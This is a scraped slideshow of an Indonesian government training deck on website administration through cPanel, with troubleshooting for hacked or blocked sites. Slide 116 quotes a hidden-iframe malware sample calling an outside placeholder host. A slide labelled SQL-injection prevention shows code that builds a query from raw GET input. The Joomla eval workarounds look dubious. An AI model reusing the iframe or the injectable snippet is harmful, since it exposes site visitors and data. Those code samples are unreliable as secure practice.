![KAS
US
4
REPORTED
ATTACK PAGE - 4
5. Coba scan sekali lagi seluruh file websitenya dengan
antivirus/malware
6. Jika sudah bersih dari virus, hapus seluruh file yang
ada di hosting [di folder public_html/]
7. Ubah password CPanel (admin dapat merubah
sendiri)
8. Upload semua file yang di local komputer ke hosting
BPS [di folder public_html/]
9. Selanjutnya minta google untuk mereview kembali
website tersebut
https://support.google.com/webmasters/answer/16832
8 117](https://image.slidesharecdn.com/pengelolaanwebsite20140822-1256-140825222741-phpapp01/75/pengelolaan-website-117-2048.jpg?cb=1668099437)
![KAS
US
5
PENGGUNAAN
FUNGSI YANG
DILARANG - 2
Identifikasi :
Pendeteksian dapat dilakukan dengan melihat file error_log yang
terletak di direktori yang sama dengan halaman yang diakses,
seperti :
/www/error_log,
/public_html/error_log, atau
/www/administrator/error_log, dll
Contoh error_log penggunaan fungsi eval() :
[14-Aug-2013 08:57:00 Asia/Jakarta] PHP Fatal error: SUHOSIN-Use
of eval is forbidden by configuration in
/home/blabla/public_htm/libraries/joomla/document/html/html.php(46
9) : eval()’d code on line 469
Hal ini karena web terdeteksi menggunakan fungsi php eval
yang beresiko terhadap keamanan web (dimanfaatkan peretas).
Fungsi tersebut tidak dapat digunakan lagi.
119](https://image.slidesharecdn.com/pengelolaanwebsite20140822-1256-140825222741-phpapp01/75/pengelolaan-website-119-2048.jpg?cb=1668099437)
![KAS
US
5
PENGGUNAAN
FUNGSI YANG
DILARANG - 4
File ke-2 : /public_html/libraries/joomla/utilities/simplexml.php
Baris yang diganti
eval('$this->'.$parent.'->addChild($name, $attrs, '.$count.');');
eval('$this->_stack[] = //$name.'['.(count($this->'.$parent.'->'.$name.') - 1).']';');
eval('$this->'.$tag.'->_data .= $data;');
Diubah menjadi
//eval('$this->'.$parent.'->addChild($name, $attrs, '.$count.');');
//eval('$this->_stack[] = //$name.'['.(count($this->'.$parent.'->'.$name.')-1).']';');
//eval('$this->'.$tag.'->_data .= $data;');
122](https://image.slidesharecdn.com/pengelolaanwebsite20140822-1256-140825222741-phpapp01/75/pengelolaan-website-122-2048.jpg?cb=1668099437)
![Yii - Pencegahan
SQL Injection
Yii menggunakan beberapa metode untuk mencegah SQL
Injection.
• Query Builder
$user= Yii::app()->db->createCommand()
->select('id, username, profile')
->from('tbl_user u')
->join('tbl_profile p','u.id=p.user_id')
->where('id=:id',array(':id'=>$id))
->queryRow()
• Active Record
$id=$_GET['id_user'];
User::model()->findAllByAttributes(array("id='$id'"));
186
C. TIPS & TRIK](https://image.slidesharecdn.com/pengelolaanwebsite20140822-1256-140825222741-phpapp01/75/pengelolaan-website-186-2048.jpg?cb=1668099437)
Mais conteúdo relacionado
Mais procurados
Mais procurados(20)
Destaque
Destaque(20)
Similar a Pengelolaan Website
Similar a Pengelolaan Website(20)
Último
Último(20)
Pengelolaan Website
- 1. PENGELOLAAN PEMBINAAAN PENGELOLA TEKNOLOGI INFORMASI WEBSITE Badan Pusat Statistik 1
- 2. POKOK BAHASAN Pengantar Website Panduan Penggunaan cPanel Manajemen Website FAQ & Troubleshooting cPanel Keamanan Website 2
- 3. PEMBINAAAN PENGELOLA TEKNOLOGI INFORMASI PENGANTAR WEBSITE Badan Pusat Statistik 3
- 4. INTERNET STORY 4 PENGANTAR WEBSITE
- 5. CARA KERJA WEBSITE User dengan Web Browser Akses Website menggunakan Internet Server : - Web Server - Database Server - dll Request Request Response Response 5 PENGANTAR WEBSITE
- 6. KEBUTUHAN WEB HOSTING UNTUK PENGELOLA WEBSITE Mengapa perlu web hosting? Web hosting adalah rumah dari semua data-data yang ada di internet. Apa saja yang diperlukan oleh sebuah web hosting agar website di dalamnya dapat diakses oleh khalayak umum? Hosting provider Domain Name Tool manajemen. 6 PENGANTAR WEBSITE
- 7. APA ITU CPANEL? Cpanel adalah sebuah aplikasi manajemen (control panel) website yang berfungsi sebagai jembatan untuk mempermudah pengelola dalam mengelola websitenya. Cpanel adalah kontrol panel terproteksi. Untuk masuk perlu username dan password. Cpanel sendiri ditampilkan dalam format web base, artinya bisa diakses melalui browser internet, semisal Internet Explorer, Firefox, Safari, dll. Aplikasi-aplikasi didukung cPanel termasuk Apache, PHP, mySQL, Postgres, Perl, Python, and BIND, dengan email seperti POP3, IMAP, layanan-layanan SMTP. Karena fungsinya sebagai jembatan, maka pengelola web bisa mengelola kebutuhan website. 7 PENGANTAR WEBSITE
- 8. MENGAPA CPANEL? Graphical User Interfaces (GUI). Banyak fitur dan modul-modul yang disediakan. Security. 8 PENGANTAR WEBSITE
- 9. MANAJEMEN WEBSITE OLEH PENGELOLA WEB BPS KAB/KOTA HTTP Akses Cpanel Menggunakan Pengelola Web BPS Kab/Kota FTP Browser https://namasubdomain.bps.go.id:208 3 Akses CPanel Menggunakan FTP Client ftp://namasubdomain.bps.go.id:21 Web Hosting BPS RI - Web Server - Database Server - Aplikasi CPanel 9 PENGANTAR WEBSITE
- 10. ARSITEKTUR WEBHOSTING BPS CPanel BPS Kab/Kota draco.bps.go.id:2083 websitebpskab3.bps.go.id:2083 websitebpskab1.bps.go.id:2083 BPS Kab/Kota 2 BPS Kab/Kota 3 BPS Kab/Kota 1 websitebpskab2.bps.go.id:2083 10 PENGANTAR WEBSITE
- 11. PANDUAN PENGGUNAAN CPANEL PEMBINAAAN PENGELOLA TEKNOLOGI INFORMASI Badan Pusat Statistik 11
- 12. CAKUPAN MATERI A. Akses CPanel B. Getting Started Wizard C. Header D. Sidebar E. Preferences F. Files G. Metrics H. Security I. Databases J. Software K. Advanced 12
- 13. AKSES MANAJEMEN CPANEL - 1 Melalui url https://namasubdomain.bps.go.id:2083 13 A. AKSES CPANEL
- 14. AKSES MANAJEMEN CPANEL - 2 Masukkan username dan password pada halaman login 14 A. AKSES CPANEL
- 15. MANAJEMEN CPANEL -1 Tampilan cpanel (theme: paper_latern) 15 A. AKSES CPANEL
- 16. MANAJEMEN CPANEL - 2 Tampilan cpanel (theme: x3) 16 A. AKSES CPANEL
- 17. GETTING STARTED WIZARD Menu ini digunakan untuk melakukan pengaturan dasar 17 B. GETTING STARTED WIZARD
- 18. PENGATURAN DASAR - 1 1. Pengaturan bahasa 18 B. GETTING STARTED WIZARD
- 19. PENGATURAN DASAR - 2 2. Penjelasan sekilas cpanel 19 B. GETTING STARTED WIZARD
- 20. PENGATURAN DASAR - 3 3. Pengaturan Web Disk 20 B. GETTING STARTED WIZARD
- 21. PENGATURAN DASAR - 4 21 B. GETTING STARTED WIZARD 4. Pengaturan Web Mail fitur ini dinonaktifkan 5. Pengaturan Tampilan manajemen cPanel
- 22. HEADER Beberapa fitur di header 1. Home 2. File Manager 3. User : Change Password, Change Language, Contact Information, Reset Page Setting 4. Logout 22 C. HEADER
- 23. SIDEBAR Switch Theme News Informasi akun cPanel 23 D. SIDEBAR
- 24. 24 D. SIDEBAR
- 25. PREFERENCES 1. Getting Started Wizard 2. Video Tutorial 3. Change Password 4. Update Contact Info 5. Change Style 6. Change Language 7. Shortcut 25 E. PREFERENCES
- 26. TAMPILAN SHORTCUT CPANEL Desktop Bookmark’s Toolbar 26 E. PREFERENCES
- 27. FILES 27 F. FILES
- 28. FILE MANAGER - 1 Fitur ini untuk melakukan manajemen file 28 F. FILES
- 29. FILE MANAGER - 2 29 F. FILES
- 30. FILE MANAGER - 3 Setting Search File Manager Toolbar File Tree Navigation Toolbar File Window File and Folder action 30 F. FILES
- 31. FILE MANAGER TOOLBAR - 1 Fitur Icon Deskripsi New File Membuat file baru sesuai keinginan user New Folder Membuat folder baru di direktori yang diakses Copy Meng-copy file yang dipilih ke direktori yang ditentukan pengguna Move File Memindahkan file yang dipilih ke direktori baru Upload Meng-upload file ke direktori yang dipilih Downloa d Download file yang dipilih ke komputer lokal Delete Menghapus file yang dipilih dari server Rename Mengubah nama file/ folder yang dipilih Edit Membuka file yang dipilih menggunakan text editor 31 F. FILES
- 32. FILE MANAGER TOOLBAR - 2 Fitur Icon Deskripsi Code Editor Membuka file yang dipilih menggunakan code editor HTML Editor Membuka file yang dipilih menggunakan visual HTML editor (HTML editor documentation) Change Permissio ns Mengubah read, write, execute permissions pada file yang dipilih View Membuka file yang terpilih sehingga kode program dapat dilihat Extract Mengekstrak file *.zip, *.Gz, atau Bz2 dan menyimpannya dalam direktori Compress Mengkompres file yang dipilih ke *.zip, *.Gz, atau *.Bz2 dan menyimpannya di direktori yang ditentukan 32 F. FILES
- 33. NAVIGATION TOOLBAR Fitur Icon Deskripsi Home Mengarahkan ke direktori home (/home/user) Up One Level Mengarahkan ke direktori dimana terdapat direktori yang sedang dipilih. Tidak aktif bila berada di /home/user Back Mengarahkan kembali ke direktori yang dilihat sebelumnya Forward Mengarahkan ke direktori yang dibuka setelahnya (setelah klik Back) Reload Refresh list file dan folder Select All Memilih seluruh file dan folder. Bila Rename, Edit, atau View lebih dari satu file hanya akan mempengaruhi file paling atas Unselect All Kebalikan dari Select All 33 F. FILES
- 34. FILE WINDOW Fitur Deskripsi File Icon Icon sesuai tipe file Name Nama file Size Ukuran file dalam bytes, kb, MB, dsb Last Modified Tanggal dan waktu terakhir file dimodifikasi Type Tipe MIME Perms Pengaturan permissions /akses file menggunakan octal notation. Default permission file 644 dan folder 755. 34 F. FILES
- 35. FILE AND FOLDER ACTIONS - 1 Fitur Deskripsi Download Download file yang dipilih ke komputer lokal View Membuka file yang terpilih sehingga kode program dapat dilihat Edit Membuka file yang dipilih menggunakan text editor Code Edit Membuka file yang dipilih menggunakan code editor HTML Edit Membuka file yang dipilih menggunakan visual HTML editor Move Memindahkan file yang dipilih ke direktori baru Copy Meng-copy file yang dipilih ke direktori yang ditentukan pengguna Rename Mengubah nama file/ folder yang dipilih Change Permissions Mengubah read, write, execute permissions pada file yang dipilih 35 F. FILES
- 36. FILE AND FOLDER ACTIONS - 2 Fitur Deskripsi Delete Menghapus file yang dipilih dari server Extract Mengekstrak file *.zip, *.Gz, atau *.Bz2 dan menyimpannya dalam direktori Compress Mengkompres file yang dipilih ke *.zip, *.Gz, atau *.Bz2 dan menyimpannya di direktori yang ditentukan Password Protect Membuat username dan password untuk akses ke folder Leech Protect Membatasi akses berlebihan oleh pengguna pada url tertentu. Akun yang login lebih dari satu kali dalam 2 jam akan diarahkan ke URL lain atau menerima pesan Internal Server Error Manage Indices Mengatur cara pengguna melihat direktori melalui web 36 F. FILES
- 37. IMAGES Terdapat tiga fungsi yang dapat digunakan: 1. Thumbnailer, membuat thumbnail 2. Image Scaler, mengubah ukuran gambar 3. Image Converter, mengubah tipe file gambar 37 F. FILES
- 38. DIRECTORY PRIVACY - 1 Fungsi ini membatasi akses user pada web (direktori tertentu) User yang mengakses harus menggunakan username dan password yang telah dibuat Cara menggunakan : 1. Klik Directory Privacy 2. Pilih direktori yang ingin dibuka 3. Pilih folder yang ingin di proteksi 38 F. FILES
- 39. DIRECTORY PRIVACY - 2 Selanjutnya akan keluar halaman Directory Privacy 4. Beri tanda ‘Password Protect This Directory’ 5. Isikan nama untuk direktori yang diproteksi (nama bebas). Nama folder akan keluar saat url folder diakses. Klik Save. Selanjutnya klik ‘Go Back’ 6. Buat user, isikan username dan password, klik ‘Add/modify authorized user’ 39 F. FILES
- 40. DIRECTORY PRIVACY - 3 40 F. FILES
- 41. DIRECTORY PRIVACY -4 Delete user 41 F. FILES
- 42. DIRECTORY PRIVACY -4 Menghilangkan proteksi password 42 F. FILES
- 43. DISK USAGE Fitur ini menampilkan bagaimana pengguna menggunakan disk space nya Membantu manajemen disk space dengan mengetahui pemakaian terbanyak disk space 43 F. FILES
- 44. WEB DISK Fungsi ini memudahkan pengguna untuk melakukan upload atau download file seperti halnya dilakukan di komputer lokal (drag and drop) Untuk mengaktikannya dapat mengikuti tahapan yang dijelaskan di cPanel (telah dijelaskan pula pada notes slide sebelumnya) 44 F. FILES
- 45. BACKUP Fungsi Backup menyediakan fasilitas untuk download backup atau upload backup sebagian atau seluruh file dan database. Macam-macam fungsi Backup 1. Full backups 2. Partial backups 45 F. FILES
- 46. FULL BACKUP Membuat full backup Klik Download - Dari Backup Destination Pilih Home Directory - klik General Backup Download Full Backup Klik Download – Pilih file backup yang akan di download Menyimpan file backup ke komputer lain Menggunakan FTP client (Filezilla atau SCP) 46 F. FILES
- 47. PARTIAL BACKUP Memungkinkan backup dan restore sebagian file atau database “Download a Home Directory Backup” “Download a Mysql Database Backup” “Restore a Home Directory Backup” “Restore a Mysql Database Backup” 47 F. FILES
- 48. BACKUP WIZARD Sangat berguna untuk pengguna baru Tampilan user friendly yang memudahkan pengguna melakukan fully backup, partial backup, atau restore dari hasil backup yang dimiliki 48 F. FILES
- 49. METRICS 49 G. METRICS
- 50. VISITORS - 1 Menampilkan seribu kunjungan terakhir ke website 50 G. METRICS
- 51. VISITORS - 2 Informasi yang ditampilkan secara default: IP, Time, Size, URL, Referring URL, User Agent Data tambahan harus dipilih terlebih dulu : Status, Method, Protocol 51 G. METRICS
- 52. ERRORS Menampilkan error yang mempengaruhi website. Digunakan untuk mencari dan memperbaiki kesalahan link atau kesalahan konfigurasi. 52 G. METRICS
- 53. BANDWIDTH Menampilkan informasi mengenai penggunaan bandwidth dalam tampilan grafik 53 G. METRICS
- 54. RAW ACCESS Berupa text file berisi informasi mengenai pengunjung website dan apa konten web yang diakses Lakukan konfigurasi untuk pengelolaan log Download dan lihat raw access log 54 G. METRICS
- 55. AWSTATS Advanced Web Statistics (awstats) menampilkan informasi mengenai siapa yang mengakses web Tampilan dalam bentuk Grafik dan Tabel Periode akses Detail pengunjung (OS, browsers, negara, dsb) 55 G. METRICS
- 56. SECURITY 56 H. SECURITY
- 57. IP BLOCKER Fitur ini untuk memblokir IP atau fully qualified domain names (FQDNs). Blokir IP masukkan IP dengan format yang dicontohkan Tampilan IP yang diblokir Buka blokir IP klik tanda delete 57 H. SECURITY
- 58. HOT LINK PROTECTION Mencegah website lain terhubung secara langsung dengan file-file pada web. Akibatnya bandwidth dicuri!! Bagaimana cara mengaktifkan hot link protection? 58 H. SECURITY
- 59. LEECH PROTECTION Leeching terjadi bila pengguna menyebarkan username dan password untuk akses url tertentu Proteksi dilakukan dengan membatasi pengguna yang dapat login dalam waktu 2 jam Akibat pengguna di suspend 59 H. SECURITY
- 60. DATABASES 60 I. DATABASES
- 61. PHPMYADMIN Third-party tool untuk mengelola database mysql Fungsi yang dapat dilakukan adalah : Add and Drop Database; Create, Alter, Delete Table; Add, Edit, Delete Fields; Execute Query, mengatur keys and permissions Saya tidak dapat mengakses database ? 61 I. DATABASES
- 62. MYSQL DATABASES Melakukan pengelolaan database dan user Modify Database : Check Database, Repair Database Database: create, delete User: create, delete, define privileges, modify privileges 62 I. DATABASES
- 63. MYSQL DATABASE WIZARD Fitur ini memudahkan pengguna membuat database, membuat user dan memberikan privilleges Step 1: Create Database Step 2: Create Database Users Step 3: Add User to Database 63 I. DATABASES
- 64. REMOTE MYSQL Fitur ini memungkinkan aplikasi lain mengakses database web 64 I. DATABASES
- 65. POSTGRESQL DATABASES 65 I. DATABASES
- 66. POSTGRESQL DATABASE WIZARD 66 I. DATABASES
- 67. PHPPGADMIN 67 I. DATABASES
- 68. SOFTWARE 68 J. SOFTWARE
- 69. PHP 69 J. SOFTWARE
- 70. SITE SOFTWARE 70 J. SOFTWARE
- 71. OPTIMIZE WEBSITE 71 J. SOFTWARE
- 72. SOFTACULOUS APPS INSTALLER 72 J. SOFTWARE
- 73. ADVANCED 73 K. ADVANCED
- 74. TRACK DNS 74 K. ADVANCED
- 75. INDEXES 75 K. ADVANCED
- 76. ERROR PAGES 76 K. ADVANCED
- 77. VIRUS SCANNER 77 K. ADVANCED
- 78. FITUR TAMBAHAN Fitur tambahan berfungsi untuk pengaturan tampilan pada halaman cpanel 78 K. ADVANCED
- 79. MANAJEMEN PEMBINAAAN PENGELOLA TEKNOLOGI INFORMASI WEBSITE Badan Pusat Statistik 79
- 80. CAKUPAN MATERI 1. Upload & Download file 2. Create Database 3. Tips & Trik Development 80
- 81. UPLOAD/ DOWNLOAD FILE Upload File Website dapat menggunakan beberapa media atau cara, diantaranya adalah : 1. FTP Client, dapat menggunakan Filezilla 2. Web browser, akses cPanel hosting 3. Arsip File ZIP / Perpaduan antara FTP Client dan cPanel untuk jumlah file yang banyak 81 A. UPLOAD / DOWNLOAD FILE
- 82. UPLOAD MELALUI FTP CLIENT - 1 1. Klik Menu Filezilla melalaui Desktop atau Start Menu. 2. Lengkapi isian konfigurasi akses pada filezilla (host, username, password, dan port). 3. Setelah berhasil mendapatkan koneksi, pilih folder public_html atau www untuk menempatkan file template website kabupaten. 82 A. UPLOAD / DOWNLOAD FILE
- 83. UPLOAD MELALUI FTP CLIENT - 2 83 A. UPLOAD / DOWNLOAD FILE
- 84. UPLOAD MELALUI FTP CLIENT - 3 4. Untuk Upload file/folder ke hosting , klik kanan mouse kemudian pilih upload 84 A. UPLOAD / DOWNLOAD FILE
- 85. UPLOAD MELALUI FTP CLIENT - 4 5. Untuk download file/folder dari hosting , klik kanan mouse kemudian pilih Download 85 A. UPLOAD / DOWNLOAD FILE
- 86. UPLOAD MELALUI CPANEL - 1 1. Akses cPanel Hosting dengan URL https://namawebsitekab.bps.go.id/cpanel 2. Masukkan username dan password yang telah diketahui . 86 A. UPLOAD / DOWNLOAD FILE
- 87. UPLOAD MELALUI CPANEL - 2 3. Kemudian Muncul Home Screen cPanel 4. Pilih Menu File Manager, untuk mengatur file yang ada pada hosting anda. 5. Klik Tombol Go 87 A. UPLOAD / DOWNLOAD FILE
- 88. UPLOAD MELALUI CPANEL - 3 6. Klik Tombol Upload untuk mengupload file/folder ke hosting. 88 A. UPLOAD / DOWNLOAD FILE
- 89. UPLOAD MELALUI CPANEL - 4 7. Tekan Tombol Browse, kemudian pilih file/folder yang mau diupload. Selanjutnya tekan tombol Open. 89 A. UPLOAD / DOWNLOAD FILE
- 90. UPLOAD ARSIP FILE ZIP 1. Pertama tentukan file yang mau di upload, Select seluruh file kemudian Klik Menu Add to archive. 90 A. UPLOAD / DOWNLOAD FILE
- 91. UPLOAD ARSIP FILE ZIP - 2 2. Pilih Format Zip, kemudian Tekan Tombol OK 91 A. UPLOAD / DOWNLOAD FILE
- 92. UPLOAD ARSIP FILE ZIP - 3 3. Upload File Arsip Zip tersebut melalui FTP Client ke hosting website. 92 A. UPLOAD / DOWNLOAD FILE
- 93. UPLOAD ARSIP FILE ZIP - 4 4. Akses cPanel melalui browser, dan pilih Menu File Manager. 5. Pilih Arsip File Zip, kemudian Pilih Menu Extract. 93 A. UPLOAD / DOWNLOAD FILE
- 94. UPLOAD ARSIP FILE ZIP - 5 6. Pilih lokasi hasil extract, selanjutnya Tekan Tombol Extract File(s) 94 A. UPLOAD / DOWNLOAD FILE
- 95. CARA MEMBUAT DATABASE MYSQL DI MANAJEMEN CPANEL - 1 1. Login cPanel pada URL https://namasubdomain.bps.go.id:2083 2. Pilih menu Databases-Mysql Database Wizard pada manajemen cPanel 95 B. CREATE DATABASE (MySQL)
- 96. CARA MEMBUAT DATABASE MYSQL DI MANAJEMEN CPANEL - 2 3. Isi nama database kemudian klik tombol Next. 96 B. CREATE DATABASE (MySQL)
- 97. CARA MEMBUAT DATABASE MYSQL DI MANAJEMEN CPANEL - 3 4. Buat user 97 B. CREATE DATABASE (MySQL)
- 98. CARA MEMBUAT DATABASE MYSQL DI MANAJEMEN CPANEL - 4 5. Memberi akses user pada database. Centang All Privileges 98 B. CREATE DATABASE (MySQL)
- 99. CARA MEMBUAT DATABASE MYSQL DI MANAJEMEN CPANEL - 5 5. Selesai. 6. Pilih ‘Return to MySQL Database’ 99 B. CREATE DATABASE (MySQL)
- 100. C. TIPS & TRIK DEVELOPMENT 1. Backup rutin melalui menu di cPanel kemudian download hasil backup ke lokal komputer. 2. Cek website secara rutin (log, statistik, tampilan, dll) 3. Jika menggunakan CMS atau Framework, lakukan update dan upgrade versi secara berkala. 4. Membuat 2 environment sistem, yaitu versi development pada komputer lokal, dan versi production pada server hosting. Lakukan uji coba pada development sebelum diupload ke production. Hal ini juga berlaku untuk database. 5. Update security issue. Lakukan upgrade pengetahuan terkini yang tersebar luas di internet. 100 TIPS & TRIK DEVELOPMENT:
- 101. FAQ & PEMBINAAAN PENGELOLA TEKNOLOGI INFORMASI TROUBLESHOOTING Badan Pusat Statistik 101
- 102. CAKUPAN MATERI 1. Connection Time Out & IP blocking 2. Bandwidth limit exceeded 3. Account Suspended 4. Reported Attack Page 5. Forbidden Access 6. Disk Usage Space 7. Malware dan penggunaan fungsi yang dilarang 8. Internal Server Error 9. Tidak bisa upload, download, edit, hapus file ke/dari server cpanel melalui web browser dan FTP client. 102
- 103. CONNECTION TIME OUT & IP BLOCKING -1 1 KAS US 103
- 104. KAS US 1 CONNECTION TIME OUT & IP BLOCKING -2 Indikasi-1 : Disebabkan oleh IP publik yang digunakan bersama-sama dalam waktu yang hampir bersamaan untuk mengakses website pada server yang sama oleh beberapa PC dalam jumlah banyak. Troubleshoot-1: a. Cek website kab/kota yang lain. b. Jika website tersebut bisa diakses, kemungkinan yang menjadi masalah adalah ada pada elemen website kab/kota ybs. c. Jika website kab/kota yang lain juga tidak bisa diakses, coba akses website ybs dari IP Publik yang berbeda. d. Jika di IP Publik yang berbeda bisa mengakses website ybs, hal ini berarti IP Publik yang tadi sudah di Blok oleh Firewall di cPanel. e. Hubungi Subdit JKD untuk membuka blokir dengan menyertakan IP Publik yang digunakan. (cek ip public di ipsaya.com). 104
- 105. KAS US 1 CONNECTION TIME OUT & IP BLOCKING -3 Indikasi-2: Melakukan upload/download file website dengan jumlah banyak dalam rentang waktu yang hampir bersamaan, baik melalui web browser atau FTP client. Troubleshoot-2: a) Upload ke cPanel Kompres file website yang banyak tersebut dalam bentuk ZIP, baru diupload. Selanjutnya melalui Menu File Manager di cPanel, file tersebut di extract. b) Download dari cPanel Pilih seluruh file yang akan didownload dan kompres menggunakan menu pada cPanel. Download file hasil kompresi tersebut. 105
- 106. KAS US 1 CONNECTION TIME OUT & IP BLOCKING -4 Indikasi-3: Adanya virus pada komputer lokal yang menyebabkan broadcast port flooding ke server hosting. Sehingga IP komputer tersebut diblok oleh firewall di cPanel. Troubleshoot-3: a. Scan komputer yang digunakan untuk mengakses website menggunakan antivirus yang terinstal. b. Tunggu selama 1 jam sebelum mengakses website kembali, atau Hubungi Subdit JKD untuk membuka blokir dengan menyertakan IP Publik yang digunakan. (cek ip public di ipsaya.com). 106
- 107. KAS US 1 CONNECTION TIME OUT & IP BLOCKING -5 Indikasi-4: Kesalahan melakukan login lebih dari 5 kali. Sehingga IP komputer tersebut diblok oleh cPanel. Troubleshoot-4: a. Hubungi Subdit JKD untuk membuka blokir dengan menyertakan IP Publik yang digunakan. (cek ip public di ipsaya.com). NOTICE! : Adanya pembatasan-pembatasan tersebut adalah kebijakan dari JKD tidak lain adalah karena alasan keamanan. 107
- 108. KAS US 2 BANDWIDTH LIMIT EXCEEDED -1 108
- 109. KAS US 2 Indikasi : BANDWIDTH LIMIT EXCEEDED -2 Secara default bandwidth limit adalah 2GB Bandwidth usage direset setiap bulannya. BANDWITH LIMIT EXCEEDED menunjukkan bandwith yang digunakan sudah melebihi limit. 109
- 110. KAS US 2 Troubleshoot : a. Coba cek awstats melalui cPanel. 1) Jika ada akses url yang aneh (indikasi sedang di DDOS) lakukan pengecekan URL tersebut selanjutnya laporkan ke JKD. 2) Jika ada file menggunakan bandwidth yang besar, biasanya penggunaan image atau file flash dengan size yang besar, lakukan pengompresan file yang bersangkutan sehingga ukurannya menjadi lebih kecil. b. Jika memang diperlukan tambahn quota bandwidth, silakan menghubungi subdit JKD sesuai dengan prosedur. c. Quota tambahan akan disesuaikan dengan kebijakan JKD. BANDWIDTH LIMIT EXCEEDED -3 110
- 111. KAS US 3 ACCOUNT SUSPENDED -1 111
- 112. KAS US 3 ACCOUNT SUSPENDED -2 Indikasi : Website yang bersangkutan sedang di-suspend sementara karena beberapa sebab. Penyebab utama adalah website yang bersangkutan terkena deface/hack dari pihak luar/peretas. Troubleshoot: a. Menyiapkan file website yang baru , karena pada file web yang lama sudah banyak backdoor yang ditanam peretas. b. Pastikan juga update versi CMS yang anda pakai jika menggunakan CMS seperti joomla, wordpress, drupal , dll. c. Jika sudah siap, upload file baru, silakan menghubungi Subdit JKD untuk membuka kembali akses web. 112
- 113. KAS US 3 ACCOUNT SUSPENDED -3 d. Upload file melalui salah satu cara berikut : 1) manajemen cpanel pada url https://namasudbdomain.bps.go.id:2083 atau https://draco.bps.go.id:2083 2) melalui ftp client menggunakan host : namasubdomain.bps.go.id. username : bpsxxyy password : sesuai password untuk login cPanel. e. Apabila lupa password dapat menghubungi Sub dit. JKD untuk reset password. f. Seluruh file-file web diletakkan langsung di bawah direktori www atau public_html. Tips : Lakukan backup secara berkala seluruh file website untuk mengantisipasi adanya deface/hack. 113
- 114. KAS US 4 REPORTED ATTACK PAGE - 1 114
- 115. KAS US 4 REPORTED ATTACK PAGE - 2 Indikasi : Warning "Reported Attack Page!" terjadi hanya pada beberapa browser mozila firefox, google chrome, dan beberapa versi Safari, karena browser-browser tersebut terhubung dengan Google. Hal itu merupakan indikasi bahwa pada beberapa file web terdapat script yang membahayakan. Review dapat dilihat dengan click tombol "Why was this page blocked?" 115
- 116. KAS US 4 REPORTED ATTACK PAGE - 3 Troubleshoot: 1. Sebelumnya pastikan PC yang akan digunakan bersih dari virus atau malware. 2. Selanjutnya Admin Website mendownload semua file websitenya (di folder public_html/) ke local komputer. 3. Kemudian coba scan menggunakan antivirus atau anti malware. 4. Untuk script-script yang terindikasi malware, harap di cek apakah script tersebut adalah coding-an sendiri, o jika iya, perbaiki code o jika tidak (kemungkinan besar), maka script tersebut sebaiknya dihapus o Hindari penggunaan < iframe> untuk akses page diluar domain tersebut. Contoh script malware: <iframe src=”http://malwarewebpages/web.html” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe> 116
- 117. KAS US 4 REPORTED ATTACK PAGE - 4 5. Coba scan sekali lagi seluruh file websitenya dengan antivirus/malware 6. Jika sudah bersih dari virus, hapus seluruh file yang ada di hosting [di folder public_html/] 7. Ubah password CPanel (admin dapat merubah sendiri) 8. Upload semua file yang di local komputer ke hosting BPS [di folder public_html/] 9. Selanjutnya minta google untuk mereview kembali website tersebut https://support.google.com/webmasters/answer/16832 8 117
- 118. KAS US 5 PENGGUNAAN FUNGSI YANG DILARANG - 1 “SUHOSIN – Use of eval is forbidden “ Eval adalah fungsi yang biasanya digunakan dalam CMS, seperti Joomla dan WordPress Penggunaan fungsi ini mengakibatkan halaman website menjadi putih (blank). 118
- 119. KAS US 5 PENGGUNAAN FUNGSI YANG DILARANG - 2 Identifikasi : Pendeteksian dapat dilakukan dengan melihat file error_log yang terletak di direktori yang sama dengan halaman yang diakses, seperti : /www/error_log, /public_html/error_log, atau /www/administrator/error_log, dll Contoh error_log penggunaan fungsi eval() : [14-Aug-2013 08:57:00 Asia/Jakarta] PHP Fatal error: SUHOSIN-Use of eval is forbidden by configuration in /home/blabla/public_htm/libraries/joomla/document/html/html.php(46 9) : eval()’d code on line 469 Hal ini karena web terdeteksi menggunakan fungsi php eval yang beresiko terhadap keamanan web (dimanfaatkan peretas). Fungsi tersebut tidak dapat digunakan lagi. 119
- 120. KAS US 5 PENGGUNAAN FUNGSI YANG DILARANG - 2 Troubleshoot : Website yang memanfaatkan fungsi tersebut harus melakukan penyesuaian dengan memanfaatkan fungsi lain pengganti fungsi eval() agar website dapat tampil kembali. 120
- 121. KAS US 5 PENGGUNAAN FUNGSI YANG DILARANG - 3 Untuk website yang menggunakan CMS joomla, pada file berikut dilakukan perubahan : File ke-1 : /public_html/libraries/joomla/document/html/html.php Baris yang diganti : $str = 'return ' . implode(' ', $words) . ';'; return eval($str); Diubah menjadi : //$str = 'return ' . implode(' ', $words) . ';'; //return eval($str); $str = implode(' ', $words) ; return $str; 121
- 122. KAS US 5 PENGGUNAAN FUNGSI YANG DILARANG - 4 File ke-2 : /public_html/libraries/joomla/utilities/simplexml.php Baris yang diganti eval('$this->'.$parent.'->addChild($name, $attrs, '.$count.');'); eval('$this->_stack[] = //$name.'['.(count($this->'.$parent.'->'.$name.') - 1).']';'); eval('$this->'.$tag.'->_data .= $data;'); Diubah menjadi //eval('$this->'.$parent.'->addChild($name, $attrs, '.$count.');'); //eval('$this->_stack[] = //$name.'['.(count($this->'.$parent.'->'.$name.')-1).']';'); //eval('$this->'.$tag.'->_data .= $data;'); 122
- 123. KAS US 6 DISK USAGE SPACE-1 123
- 124. KAS US 6 DISK USAGE SPACE-2 Identifikasi : Secara default quota disk space disediakan sebesar 2GB. Warna merah menunjukkan bahwa disk sudah penuh atau melebihi quota. Troubleshoot : 1. Hapus file yang tidak perlu atau tidak digunakan. 2. Silahkan menghubungi subdit JKD untuk meminta tambahan disk space yang diperbolehkan sesuai dengan prosedur. 3. Penambahan quota akan disesuaikan dengan kebijakan JKD. Notice: Hosting website bukan untuk sarana penyimpanan file. Hosting website hanya untuk file yang berhubungan dengan website. 124
- 125. KAS US 7 FORBIDDEN ACCESS-1 125
- 126. KAS US 7 FORBIDDEN ACCESS-2 Identifikasi : Disebabkan adanya script yang dianggap berbahaya oleh security pada server. Sebagian besar terjadi pada website yang menggunakan CMS. Adanya Script tersebut akibat serangan dengan meletakkan file di web server atau SQL Injection. Script yang dianggap berbahaya tersebut diblok oleh mod_security di server. Biasanya dialami oleh pengguna CMS Joomla dengn versi lama. 126
